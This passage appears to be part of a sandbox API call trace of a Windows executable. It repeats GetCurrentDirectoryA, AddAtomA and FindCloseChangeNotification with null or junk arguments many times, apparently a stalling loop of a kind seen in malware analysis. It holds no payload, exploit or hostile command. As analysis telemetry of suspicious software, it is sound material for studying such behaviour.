lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.290] AddAtomA (lpString=0x0) returned 0x0 [0077.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.290] AddAtomA (lpString=0x0) returned 0x0 [0077.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.291] AddAtomA (lpString=0x0) returned 0x0 [0077.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.291] AddAtomA (lpString=0x0) returned 0x0 [0077.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.291] AddAtomA (lpString=0x0) returned 0x0 [0077.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.291] AddAtomA (lpString=0x0) returned 0x0 [0077.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.291] AddAtomA (lpString=0x0) returned 0x0 [0077.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.291] AddAtomA (lpString=0x0) returned 0x0 [0077.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.291] AddAtomA (lpString=0x0) returned 0x0 [0077.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.291] AddAtomA (lpString=0x0) returned 0x0 [0077.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.291] AddAtomA (lpString=0x0) returned 0x0 [0077.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.292] AddAtomA (lpString=0x0) returned 0x0 [0077.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.292] AddAtomA (lpString=0x0) returned 0x0 [0077.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.292] AddAtomA (lpString=0x0) returned 0x0 [0077.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.292] AddAtomA (lpString=0x0) returned 0x0 [0077.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.292] AddAtomA (lpString=0x0) returned 0x0 [0077.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.292] AddAtomA (lpString=0x0) returned 0x0 [0077.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.292] AddAtomA (lpString=0x0) returned 0x0 [0077.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.292] AddAtomA (lpString=0x0) returned 0x0 [0077.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.292] AddAtomA (lpString=0x0) returned 0x0 [0077.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.293] AddAtomA (lpString=0x0) returned 0x0 [0077.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.293] AddAtomA (lpString=0x0) returned 0x0 [0077.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.293] AddAtomA (lpString=0x0) returned 0x0 [0077.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.293] AddAtomA (lpString=0x0) returned 0x0 [0077.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.293] AddAtomA (lpString=0x0) returned 0x0 [0077.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.293] AddAtomA (lpString=0x0) returned 0x0 [0077.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.294] AddAtomA (lpString=0x0) returned 0x0 [0077.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.294] AddAtomA (lpString=0x0) returned 0x0 [0077.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.294] AddAtomA (lpString=0x0) returned 0x0 [0077.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.294] AddAtomA (lpString=0x0) returned 0x0 [0077.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.294] AddAtomA (lpString=0x0) returned 0x0 [0077.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.294] AddAtomA (lpString=0x0) returned 0x0 [0077.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.294] AddAtomA (lpString=0x0) returned 0x0 [0077.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.295] AddAtomA (lpString=0x0) returned 0x0 [0077.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.295] AddAtomA (lpString=0x0) returned 0x0 [0077.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.295] AddAtomA (lpString=0x0) returned 0x0 [0077.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.295] AddAtomA (lpString=0x0) returned 0x0 [0077.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.295] AddAtomA (lpString=0x0) returned 0x0 [0077.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.296] AddAtomA (lpString=0x0) returned 0x0 [0077.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.296] AddAtomA (lpString=0x0) returned 0x0 [0077.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.296] AddAtomA (lpString=0x0) returned 0x0 [0077.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.296] AddAtomA (lpString=0x0) returned 0x0 [0077.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.296] AddAtomA (lpString=0x0) returned 0x0 [0077.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.296] AddAtomA (lpString=0x0) returned 0x0 [0077.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.297] AddAtomA (lpString=0x0) returned 0x0 [0077.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.297] AddAtomA (lpString=0x0) returned 0x0 [0077.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.297] AddAtomA (lpString=0x0) returned 0x0 [0077.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.297] AddAtomA (lpString=0x0) returned 0x0 [0077.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.297] AddAtomA (lpString=0x0) returned 0x0 [0077.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.297] AddAtomA (lpString=0x0) returned 0x0 [0077.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.298] AddAtomA (lpString=0x0) returned 0x0 [0077.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.298] AddAtomA (lpString=0x0) returned 0x0 [0077.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.298] AddAtomA (lpString=0x0) returned 0x0 [0077.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.298] AddAtomA (lpString=0x0) returned 0x0 [0077.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.298] AddAtomA (lpString=0x0) returned 0x0 [0077.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.298] AddAtomA (lpString=0x0) returned 0x0 [0077.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.298] AddAtomA (lpString=0x0) returned 0x0 [0077.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.299] AddAtomA (lpString=0x0) returned 0x0 [0077.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.299] AddAtomA (lpString=0x0) returned 0x0 [0077.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.299] AddAtomA (lpString=0x0) returned 0x0 [0077.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.299] AddAtomA (lpString=0x0) returned 0x0 [0077.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.299] AddAtomA (lpString=0x0) returned 0x0 [0077.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.299] AddAtomA (lpString=0x0) returned 0x0 [0077.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.299] AddAtomA (lpString=0x0) returned 0x0 [0077.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.299] AddAtomA (lpString=0x0) returned 0x0 [0077.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.299] AddAtomA (lpString=0x0) returned 0x0 [0077.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.300] AddAtomA (lpString=0x0) returned 0x0 [0077.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.300] AddAtomA (lpString=0x0) returned 0x0 [0077.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.300] AddAtomA (lpString=0x0) returned 0x0 [0077.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.300] AddAtomA (lpString=0x0) returned 0x0 [0077.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.300] AddAtomA (lpString=0x0) returned 0x0 [0077.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.300] AddAtomA (lpString=0x0) returned 0x0 [0077.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.300] AddAtomA (lpString=0x0) returned 0x0 [0077.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.300] AddAtomA (lpString=0x0) returned 0x0 [0077.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.301] AddAtomA (lpString=0x0) returned 0x0 [0077.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.301] AddAtomA (lpString=0x0) returned 0x0 [0077.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.301] AddAtomA (lpString=0x0) returned 0x0 [0077.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.301] AddAtomA (lpString=0x0) returned 0x0 [0077.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.301] AddAtomA (lpString=0x0) returned 0x0 [0077.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.301] AddAtomA (lpString=0x0) returned 0x0 [0077.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.301] AddAtomA (lpString=0x0) returned 0x0 [0077.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.301] AddAtomA (lpString=0x0) returned 0x0 [0077.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.301] AddAtomA (lpString=0x0) returned 0x0 [0077.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.302] AddAtomA (lpString=0x0) returned 0x0 [0077.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.302] AddAtomA (lpString=0x0) returned 0x0 [0077.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.302] AddAtomA (lpString=0x0) returned 0x0 [0077.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.302] AddAtomA (lpString=0x0) returned 0x0 [0077.381] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.381] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.381] AddAtomA (lpString=0x0) returned 0x0 [0077.382] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.382] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.382] AddAtomA (lpString=0x0) returned 0x0 [0077.382] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.382] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.382] AddAtomA (lpString=0x0) returned 0x0 [0077.382] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.382] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.382] AddAtomA (lpString=0x0) returned 0x0 [0077.382] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.382] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.382] AddAtomA (lpString=0x0) returned 0x0 [0077.382] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.382] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.382] AddAtomA (lpString=0x0) returned 0x0 [0077.382] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.382] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.382] AddAtomA (lpString=0x0) returned 0x0 [0077.382] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.382] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.382] AddAtomA (lpString=0x0) returned 0x0 [0077.382] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.382] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.382] AddAtomA (lpString=0x0) returned 0x0 [0077.383] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.383] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.383] AddAtomA (lpString=0x0) returned 0x0 [0077.383] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.383] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.383] AddAtomA (lpString=0x0) returned 0x0 [0077.383] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.383] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.383] AddAtomA (lpString=0x0) returned 0x0 [0077.383] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.383] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.383] AddAtomA (lpString=0x0) returned 0x0 [0077.383] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.383] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.383] AddAtomA (lpString=0x0) returned 0x0 [0077.383] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.383] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.383] AddAtomA (lpString=0x0) returned 0x0 [0077.383] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.383] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.383] AddAtomA (lpString=0x0) returned 0x0 [0077.384] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.384] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.384] AddAtomA (lpString=0x0) returned 0x0 [0077.384] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.384] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.384] AddAtomA (lpString=0x0) returned 0x0 [0077.384] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.384] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.384] AddAtomA (lpString=0x0) returned 0x0 [0077.384] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.384] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.384] AddAtomA (lpString=0x0) returned 0x0 [0077.384] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.384] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.384] AddAtomA (lpString=0x0) returned 0x0 [0077.384] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.384] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.384] AddAtomA (lpString=0x0) returned 0x0 [0077.384] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.384] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.384] AddAtomA (lpString=0x0) returned 0x0 [0077.384] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.384] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.384] AddAtomA (lpString=0x0) returned 0x0 [0077.384] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.385] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.385] AddAtomA (lpString=0x0) returned 0x0 [0077.385] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.385] GetCurrentDirectoryA (in: 